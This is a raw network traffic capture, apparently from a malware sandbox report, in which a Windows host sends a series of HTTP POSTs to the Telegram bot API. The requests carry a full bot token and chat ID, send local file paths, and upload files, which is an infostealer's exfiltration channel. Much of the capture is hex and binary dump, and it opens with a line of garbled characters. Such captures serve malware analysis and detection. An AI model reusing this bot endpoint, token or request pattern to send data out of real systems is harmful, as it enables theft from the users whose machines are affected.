K?<i6F\|ip2\|(nTP/knA*&r="U4C1={\C3QA%7jj6bIh+\|VN$xh&=uz'Nue;m7aJl"#6Z]<'X$L4}9(,(Ii#VK0p^e7cHF'
2024-05-23 13:36:27 UTC	4096	OUT	Data Raw: 1f 4d 41 4e 7e 11 8a ec 46 9c dd 30 11 8d 3d 07 63 eb 8f 98 86 4d 7b 4c c5 f9 d2 a6 61 db 51 38 ad 9c cf 97 b7 4f 47 9b 26 5d 30 7b c7 35 e8 1c 85 28 2e 2e 42 81 d2 b8 e9 93 75 30 59 33 cb 36 0d 6d 61 58 e4 6e 1a 86 ed 45 ff 5e 1d 30 78 dd 75 64 16 e4 b9 e6 98 32 5a 91 99 9d 05 a7 dd 95 bf 5a 22 25 fb f4 9f 8c f3 3a b7 fa 5f 3e 1e 6d ea 77 c7 d2 a3 77 61 4a b9 88 09 dd 5b a3 db 98 85 b8 12 2b 73 50 e1 f1 f4 a4 34 0d ab bc 69 28 db 91 37 50 24 4a 4d e6 67 7d 9a 24 d2 50 cc 10 99 7f f5 25 66 7a 43 f8 a6 31 a8 ff 65 5b ec 4b 7a dc e6 cb 4f 3d 81 5e 9f 7d 8c 61 eb ae aa 06 e0 bd 0d fd 51 bb db 38 44 ba 2d e6 54 ae c3 b9 7d ea e1 6f 8d 27 e3 ae f8 07 c5 06 84 8c f3 c0 7f fd 67 6d 4c 59 7a 1a 49 a6 52 26 54 71 7e 59 7b 8a 83 01 1d 50 bf d5 68 84 e7 3e fe 4d fa Data Ascii: MAN~F0=cM{LaQ8OG&]0{5(..Bu0Y36maXnE^0xud2ZZ"%:_>mwwaJ[+sP4i(7P$JMg}$P%fzC1e[KzO=^}aQ8D-T}o'gmLYzIR&Tq~Y{Ph>M
2024-05-23 13:36:27 UTC	4096	OUT	Data Raw: 06 06 22 24 24 44 0d d4 d9 b2 65 0b a6 4e 9d 8a f6 ed db ab df cb 5f f9 4c 33 f8 2a ca cc 14 e3 50 d2 a7 4a e6 2a 19 5b 92 8c 81 f2 e2 ba 04 00 79 7a 7a 62 fc f8 f1 6a 56 1e c9 ca 27 59 70 86 0d 1b a6 46 16 ca b2 43 87 0e 55 c7 d4 a5 cf 56 5e 7d 35 19 eb b4 99 0c ea d8 79 bb 28 27 6a dc 2c 7a fe 88 c3 30 97 61 f8 5f 37 9c d8 1f af 43 b6 c9 e0 f6 52 2b a9 ac c6 a1 44 d4 3d 2f 32 96 45 c3 b0 12 99 86 da c0 8d 34 52 af c2 9b 1e ec d1 4c bf 8b 17 2f aa 13 d1 0a 12 61 28 0d 91 56 36 29 a7 34 76 92 ae 54 90 34 65 52 91 da e4 9b af 5a 86 97 33 0d 1f 19 87 8f d7 a7 b1 d4 85 66 52 23 06 b5 ef cd 6a 8a 30 2d cd a9 d1 15 4d f8 d8 3a ca 67 e6 27 3f 33 a9 eb 9a 55 63 ee c6 e6 c9 e8 d5 6f 22 4e 25 da 91 29 f3 ec 99 cb 30 4e d5 df 7d f8 dd d3 ca 62 72 fb ce 64 7e e2 dc Data Ascii: "$$DeN_L3PJ[yzzbjV'YpFCUV^}5y('j,z0a_7CR+D=/2E4RL/a(V6)4vT4eRZ3fR#j0-M:g'?3Uco"N%)0N}brd~
2024-05-23 13:36:27 UTC	4096	OUT	Data Raw: 7e f9 33 fc f4 a7 3f c5 4f ff fd df f1 d3 9f ff 12 bf fd d3 fb f8 ac 76 7d 4c dc 7c 1c 8e b7 e4 e5 d5 22 4b 22 f6 07 f4 43 97 d6 75 30 e5 fb 3b a8 4c a7 60 d2 0f 93 50 eb fd 9f fd ff ec dd 07 58 15 d7 be 3f fc f7 bd ff f7 de f7 9e 73 ee 49 b3 f7 82 35 31 d1 98 62 8e 49 4c b9 39 89 25 d6 d8 05 e9 bd f7 ae 82 08 52 c4 42 11 6c d8 b0 63 c1 86 15 91 26 28 a0 34 e9 bd f7 de e1 fb 9f 35 9b 0d 1b 44 c5 02 02 fe 3e cf b3 9e 44 18 f6 cc ac 59 33 7b f6 fa ee b5 06 1f 7c 38 15 5a 6e 7e 7d 2c 34 6c 46 c2 99 3d d0 5e f6 13 24 4c ad 10 41 9f 95 08 21 84 90 7e 8f 85 83 4b 5c 8b f0 d3 8e 02 7e 64 93 e4 e1 12 3c 48 a1 69 47 08 79 17 2e 44 d4 60 19 3b 1f 1d 04 e7 e3 46 8f 12 04 25 d1 f9 48 c8 bb 50 56 56 c6 4f 55 ca 46 19 b2 92 96 96 f6 96 3b cc 08 21 84 10 42 fa 26 f6 3c Data Ascii: ~3?Ov}L\|"K"Cu0;L`PX?sI51bIL9%RBlc&(45D>DY3{\|8Zn~},4lF=^$LA!~K\~d<HiGy.D`;F%HPVVOUF;!B&<
2024-05-23 13:36:27 UTC	4096	OUT	Data Raw: 36 58 35 ff 07 4c 19 33 14 1f 0f 1a 85 cf 66 7d 07 c5 ed 07 90 5c 29 38 00 9d 43 c3 26 c1 19 83 db 4e 8a f8 6c 1a 77 4c a6 cc c0 cc cf bf c0 67 9f 4e 87 98 d8 58 4c 9d fd 13 14 1d ae a0 3d 23 eb 18 d2 1d 89 10 69 47 55 a1 30 f9 eb 07 8c 19 3c 01 4b 35 dd 90 da ba 7c ec 25 1b cc 9f 3d 1d 53 66 7d 89 ef b9 e3 bd 70 e1 42 2c fa e3 57 cc 99 f5 29 c6 4d 9f 85 35 3b ef b5 be c0 db 0f 0d 07 73 cb ff b6 6a 67 87 e7 49 a6 dd 71 c0 4f 62 53 30 65 3a d7 fe fe e8 d8 fe 16 f1 ed 6f 09 16 28 6c c6 f5 a7 95 82 97 ca 09 c5 76 43 19 fc fc cd 67 18 3e e8 13 8c 18 25 86 b9 bf ff 05 a7 db 8f 51 d7 44 17 79 42 08 21 44 a8 2c fa 32 36 6f f8 0a 9f 7f a7 81 cb 49 95 cf 59 aa 14 87 e4 97 62 cb f1 84 67 7e 93 72 d9 1c f2 1b ed 10 4b 23 f9 09 79 46 6d cc 05 48 6c fc 0b fb ef a6 20 Data Ascii: 6X5L3f}\)8C&NlwLgNXL=#iGU0<K5\|%=Sf}pB,W)M5;sjgIqObS0e:o(lvCg>%QDyB!D,26oIYbg~rK#yFmHl
2024-05-23 13:36:27 UTC	4096	OUT	Data Raw: 72 45 60 86 c8 53 3e eb 52 71 de 75 3b f4 35 0d e1 c4 d5 6f a1 68 1b 49 f2 c7 49 47 2b 6c 31 31 e3 1b bc f1 36 2b b8 7b 5e 46 5c 76 61 e7 d6 84 28 2f 77 d8 73 ed c5 88 3b 6e 2e 6e d7 51 58 d7 5e 73 55 99 d1 38 e3 ea c4 7f 13 81 15 e7 fd e7 10 92 f8 00 67 1d 4d a0 67 60 83 ab 91 79 82 7a ae cb c2 95 23 f6 d0 d4 32 82 c3 de 9b cf 79 9e 44 33 32 a3 6e c1 d5 49 b4 fd ed c6 91 5b 8f 51 d4 f6 e5 86 0a e4 45 fb 61 bf bd 03 8c b9 f5 99 6d e2 96 71 39 0c 9f 07 25 74 f5 22 84 10 42 84 5a f2 e1 a1 f6 07 56 c8 ea c3 98 bb f7 31 e2 ee 23 94 56 2f c4 5f 2a 07 91 9c 76 1b 1a 4b 14 70 36 59 f8 e6 9a 89 03 6a e2 d8 7d 2a 00 c7 0c e5 a1 e6 e8 d7 f6 fc e7 e8 f3 14 1a 12 f2 3c fc f4 a4 aa f2 b8 14 53 83 96 96 8e 9f 2c 6a 32 7c 61 22 27 0d cf 48 76 36 b5 e0 e1 7e 5d ac 51 74 Data Ascii: rE`S>Rqu;5ohIIG+l116+{^F\va(/ws;n.nQX^sU8gMg`yz#2yD32nI[QEamq9%t"BZV1#V/_vKp6Yj}<S,j2\|a"'Hv6~]Qt
2024-05-23 13:36:27 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:27 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
253	192.168.2.5	61309	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:27 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 348 Expect: 100-continue
2024-05-23 13:36:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:28 UTC	348	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 33 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+32.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:36:28 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:28 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
254	192.168.2.5	61310	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:28 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 208 Expect: 100-continue
2024-05-23 13:36:28 UTC	208	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 41 64 64 72 65 73 73 42 6f 6f 6b 32 78 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 74 68 65 6d 65 73 25 35 43 64 61 72 6b 25 35 43 41 64 64 72 65 73 73 42 6f 6f 6b 32 78 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 35 39 36 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+AddressBook2x.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cthemes%5Cdark%5CAddressBook2x.png%0ASize%3A+596+B
2024-05-23 13:36:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:28 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:28 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
255	192.168.2.5	61311	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:28 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 258 Expect: 100-continue
2024-05-23 13:36:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:29 UTC	258	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 36 35 33 34 34 36 35 65 61 34 31 38 62 36 63 32 35 32 65 32 62 37 34 62 63 39 65 34 62 62 62 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 63 36 35 33 34 34 36 35 65 61 34 31 38 62 36 63 32 35 32 65 32 62 37 34 62 63 39 65 34 62 62 62 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 32 35 36 Data Ascii: chat_id=1655240967&text=File%3A+c6534465ea418b6c252e2b74bc9e4bbb.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5Cc6534465ea418b6c252e2b74bc9e4bbb.png%0ASize%3A+256
2024-05-23 13:36:29 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:29 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
256	192.168.2.5	61312	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:29 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="e0df5263-6b9a-466f-a257-99d5fc14a0f2" Host: api.telegram.org Content-Length: 1229 Expect: 100-continue
2024-05-23 13:36:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:29 UTC	40	OUT	Data Raw: 2d 2d 65 30 64 66 35 32 36 33 2d 36 62 39 61 2d 34 36 36 66 2d 61 32 35 37 2d 39 39 64 35 66 63 31 34 61 30 66 32 0d 0a Data Ascii: --e0df5263-6b9a-466f-a257-99d5fc14a0f2
2024-05-23 13:36:29 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 33 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 33 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=32.png; filename*=utf-8''32.png
2024-05-23 13:36:29 UTC	913	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 03 58 49 44 41 54 58 85 bd 97 4d 6b 24 55 14 86 9f f7 de ea ee f4 b4 26 99 c1 41 06 c4 3f a0 88 a0 20 b8 1a d4 1f 20 03 09 b8 54 d0 59 b8 d1 8d 1b 45 c2 64 dc a8 b8 88 2b 17 fe 81 04 fc 05 2e dc 88 5f 83 c2 10 97 8a 0b 99 41 94 61 9c 49 d2 9d ee ba f7 75 51 9d ce 87 dd a9 6a 0d 73 a0 ba e8 a2 ee 39 4f dd f3 9e 7b cf 85 33 37 6b 9e b7 8b a9 4f d7 1c 5e 68 f5 df 54 88 cf e5 3c 12 46 b3 bc 1a 03 ca c5 42 37 dc fe e3 d6 37 db 1f e9 53 d6 1c 58 53 9e 1f 60 3c f0 72 dc 7d bb b3 d4 fb b8 1c 40 50 7b 76 74 c0 06 0c 31 42 2a 7a af 5c 78 ed c6 f2 9d 35 ad b3 b2 19 d9 5a 4d f3 01 fc 8c 00 14 f4 7c da 27 95 83 dd 91 34 63 96 26 00 ae ee 21 3a 0d ee d2 ea 9e bf 76 Data Ascii: PNGIHDR szzXIDATXMk$U&A? TYEd+._AaIuQjs9O{37kO^hT<FB77SXS`<r}@P{vt1B*z\x5ZM\|'4c&!:v
2024-05-23 13:36:29 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 65 30 64 66 35 32 36 33 2d 36 62 39 61 2d 34 36 36 66 2d 61 32 35 37 2d 39 39 64 35 66 63 31 34 61 30 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --e0df5263-6b9a-466f-a257-99d5fc14a0f2Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:36:29 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:36:29 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 65 30 64 66 35 32 36 33 2d 36 62 39 61 2d 34 36 36 66 2d 61 32 35 37 2d 39 39 64 35 66 63 31 34 61 30 66 32 2d 2d 0d 0a Data Ascii: --e0df5263-6b9a-466f-a257-99d5fc14a0f2--
2024-05-23 13:36:29 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:29 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
257	192.168.2.5	61313	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:29 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="578eee22-8a09-41b4-89b2-60ecaf03bffa" Host: api.telegram.org Content-Length: 934 Expect: 100-continue
2024-05-23 13:36:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:29 UTC	40	OUT	Data Raw: 2d 2d 35 37 38 65 65 65 32 32 2d 38 61 30 39 2d 34 31 62 34 2d 38 39 62 32 2d 36 30 65 63 61 66 30 33 62 66 66 61 0d 0a Data Ascii: --578eee22-8a09-41b4-89b2-60ecaf03bffa
2024-05-23 13:36:29 UTC	113	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 41 64 64 72 65 73 73 42 6f 6f 6b 32 78 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 41 64 64 72 65 73 73 42 6f 6f 6b 32 78 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=AddressBook2x.png; filename*=utf-8''AddressBook2x.png
2024-05-23 13:36:29 UTC	596	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 24 00 00 00 24 08 06 00 00 00 e1 00 98 98 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 02 0e 49 44 41 54 58 09 ed 98 bf 4b c3 50 10 c7 93 34 50 8a 53 14 94 82 0e 99 3b f4 d7 20 88 f8 83 2e fa 27 08 ce 4e 4e 0e 3a b9 89 83 08 9d f5 1f 70 ec 2c 82 14 9c 53 74 50 74 ea a2 54 94 4a 85 22 82 69 e3 f7 89 57 c3 6b fb fa 30 2f 1a a5 81 70 f7 ee 8e bb 0f 97 97 7b 21 9a 36 bc c4 1d d0 79 77 a5 52 a9 7b 9e 37 4a f6 7c 3e ff 11 e3 38 8e 47 36 45 b2 a6 eb 7a 39 16 8b 6d a6 d3 e9 5b ca 69 90 42 d2 0f 43 b6 90 64 12 b5 56 5a ad d6 05 ae 49 aa d1 05 44 8e 9f 92 ac 01 80 da a3 7a bf 0e c4 40 00 b5 10 29 20 c0 24 a3 06 44 3c 5a 24 1e 59 87 06 4a 28 40 78 9d 1f 71 3f f8 0b c9 ea 4a 81 00 d1 c0 5c 59 ca e5 72 e3 b8 27 Data Ascii: PNGIHDR$$sRGBIDATXKP4PS; .'NN:p,StPtTJ"iWk0/p{!6ywR{7J\|>8G6Ez9m[iBCdVZIDz@) $D<Z$YJ(@xq?J\Yr'
2024-05-23 13:36:29 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 35 37 38 65 65 65 32 32 2d 38 61 30 39 2d 34 31 62 34 2d 38 39 62 32 2d 36 30 65 63 61 66 30 33 62 66 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --578eee22-8a09-41b4-89b2-60ecaf03bffaContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:36:29 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:36:29 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 35 37 38 65 65 65 32 32 2d 38 61 30 39 2d 34 31 62 34 2d 38 39 62 32 2d 36 30 65 63 61 66 30 33 62 66 66 61 2d 2d 0d 0a Data Ascii: --578eee22-8a09-41b4-89b2-60ecaf03bffa--
2024-05-23 13:36:30 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:30 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
258	192.168.2.5	61314	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:29 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="593636b9-6ab3-4b39-b64c-0c606f68b8ae" Host: api.telegram.org Content-Length: 262934 Expect: 100-continue
2024-05-23 13:36:30 UTC	40	OUT	Data Raw: 2d 2d 35 39 33 36 33 36 62 39 2d 36 61 62 33 2d 34 62 33 39 2d 62 36 34 63 2d 30 63 36 30 36 66 36 38 62 38 61 65 0d 0a Data Ascii: --593636b9-6ab3-4b39-b64c-0c606f68b8ae
2024-05-23 13:36:30 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 36 35 33 34 34 36 35 65 61 34 31 38 62 36 63 32 35 32 65 32 62 37 34 62 63 39 65 34 62 62 62 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 36 35 33 34 34 36 35 65 61 34 31 38 62 36 63 32 35 32 65 32 62 37 34 62 63 39 65 34 62 62 62 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=c6534465ea418b6c252e2b74bc9e4bbb.png; filename*=utf-8''c6534465ea418b6c252e2b74bc9e4bbb.png
2024-05-23 13:36:30 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 d6 00 00 04 ba 08 02 00 00 00 d2 b5 3e ce 00 00 80 00 49 44 41 54 78 da ec dd f9 5f 14 57 be ff f1 fb 4f 7c 7f fe de 65 e6 ce 76 33 73 e7 66 66 ee 4c e6 3a 77 ee fd 3a 73 27 df 1b 4d a3 18 5c a3 62 14 a2 31 c6 2d b8 c6 08 b8 c4 5d dc 11 35 41 71 df 88 8a 6b a2 26 a0 80 2c 06 02 2a 2a 28 a8 20 9b ac 0d d8 1a bf 9f cb 99 d4 f7 58 d5 dd 14 4d d3 dd e8 eb f9 a8 87 0f a8 3e 55 5d 7d aa ea 50 5d 6f cf a9 bf d9 b0 6e 1d 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 13 93 5f a6 bf a1 0a 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 98 fc 1c c1 26 bc 75 a3 5b 93 0b 00 00 00 00 00 00 00 00 00 00 a0 21 82 05 00 00 00 00 00 00 00 00 00 00 bf Data Ascii: PNGIHDR>IDATx_WO\|ev3sffL:w:s'M\b1-]5Aqk&,**( XM>U]}P]on_&u[!
2024-05-23 13:36:30 UTC	4096	OUT	Data Raw: 07 70 9e 18 15 a5 f6 85 9c 33 49 89 89 c6 7c 59 73 4f 2a 4d 91 8d d1 1f d6 1b 6a 11 6c ef ed 59 00 00 00 28 6d 6d 6d 65 65 65 59 9d e4 07 a7 d3 19 9a db 59 5f 5f 5f 5b 5b cb fe a2 62 41 4b 15 ca 2d 15 00 00 00 7a 8f 7a 00 ea b9 73 e7 02 1f 10 2e 5a b4 48 0f 29 2f 5c b8 e0 3d 6d 5d af 79 f0 e0 81 a7 08 b6 a3 a3 23 22 22 c2 98 29 1f d0 ba b6 f4 f4 74 7d c1 cc cc 4c 99 d9 d8 d8 68 7a 3c ad c9 90 21 43 12 13 13 8d 5e b0 f3 e7 cf 77 d8 36 61 c2 84 c0 d7 b0 ec 56 55 03 fe 3a 5a 42 28 82 35 66 ea f1 95 f5 d1 ad 2e db 91 98 f5 d9 9c a1 10 c1 9a 72 b8 fc bc 3c 6b 2f 55 a9 01 9b 5b 62 df f5 eb d7 f5 37 b2 f9 16 5d 76 53 36 8d 11 ed 43 cc 59 5d 5d 6d ad 81 be 18 c1 fa b0 67 01 00 21 e8 eb af bf 1e dc 49 2e 4f ed 2f 75 ec d8 31 59 64 f9 f2 e5 7e 29 e6 85 6c 95 ac 61 Data Ascii: p3I\|YsO*MjlY(mmmeeeYY___[[bAK-zzs.ZH)/\=m]y#"")t}Lhz<!C^w6aVU:ZB(5f.r<k/U[b7]vS6CY]]mg!I.O/u1Yd~)la
2024-05-23 13:36:30 UTC	4096	OUT	Data Raw: e5 e5 59 17 39 71 e2 84 5e 4c 2e 1b 4c 05 e4 e2 6a f1 e2 c5 72 3d a6 17 93 b7 90 15 e6 e4 e4 58 57 28 57 4d 72 f1 e9 b6 57 ee d8 b1 63 e5 bb 6d 4d 4d 8d 75 29 f9 92 28 17 6c 23 47 8e b4 e6 b5 27 4f 9e 0c 7c fe 2a 64 57 ca 06 c8 6e f5 ef 71 12 ea 11 6c 73 53 93 9e b7 a5 5a fe 0f 75 46 7a 7a 52 62 a2 fe 3c 51 35 40 ae a7 be 86 72 01 ba 27 25 c5 c8 d2 4c a1 ac b5 7c 7e 5e 9e 91 68 c6 cc 9c a9 d6 ac 87 7c 6e 07 04 b6 b3 55 b2 25 6a 0c 5b bd 3b a9 a7 2d 97 77 91 cd 56 e3 d9 4a 31 f9 d9 cb 40 c4 6a b3 a5 8c f1 e9 8c 0d f0 b4 94 db 4a d0 f3 57 35 a2 af 31 c9 a7 33 8d 6c ac 32 48 9f 7b 9a ca 86 c9 1a f4 dd 21 1f d3 d3 43 6d bb 